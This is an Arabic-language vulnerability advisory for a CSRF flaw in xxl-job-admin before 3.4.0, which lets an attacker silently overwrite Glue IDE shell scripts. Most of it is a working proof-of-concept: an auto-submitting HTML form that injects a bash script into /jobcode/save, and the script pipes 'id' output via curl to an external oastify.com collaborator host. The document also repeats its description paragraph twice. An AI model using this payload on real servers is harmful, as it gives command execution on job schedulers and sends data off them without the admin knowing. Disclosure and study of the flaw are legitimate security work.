
توجد ثغرة أمنية من نوع Cross-Site Request Forgery (CSRF) في تطبيق الويب xxl-job-admin تسمح للمهاجم بإجراء تعديلات غير مصرح بها على سكريبتات شل الخاصة بـ Glue IDE. لا يقوم نقطة النهاية المتأثرة بالتحقق السليم من رمز CSRF وتقبل أي طرق HTTP عشوائية عبر تعيين طلب متساهل.
توجد ثغرة أمنية من نوع تزوير الطلب عبر المواقع (CSRF) في تطبيق الويب xxl-job-admin تسمح للمهاجم بإجراء تعديلات غير مصرح بها على نصوص شل الخاصة بـ Glue IDE. يفتقر نقطة النهاية المتأثرة إلى التحقق المناسب من رمز CSRF وتقبل طرق HTTP عشوائية عبر تعيين طلب متساهل.
xxl-job < 3.4.0
يمكن للمهاجم خداع مسؤول مصادق عليه لإجراء تغييرات غير مصرح بها على نصوص شل الخاصة بـ Glue IDE.
// Decode and change it
<html>
<body>
<form action="https://domain.com/jobcode/save">
<input type="hidden" name="id" value="294" />
<input type="hidden" name="glueSource" value="#!/bin/bash id | curl -d @- http://qic8br6d6om2j459zk4evuimldr4f03p.oastify.com  exit 0 " />
<input type="hidden" name="glueRemark" value="12345" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
الاعتماد لـ Ibrahim Sartawi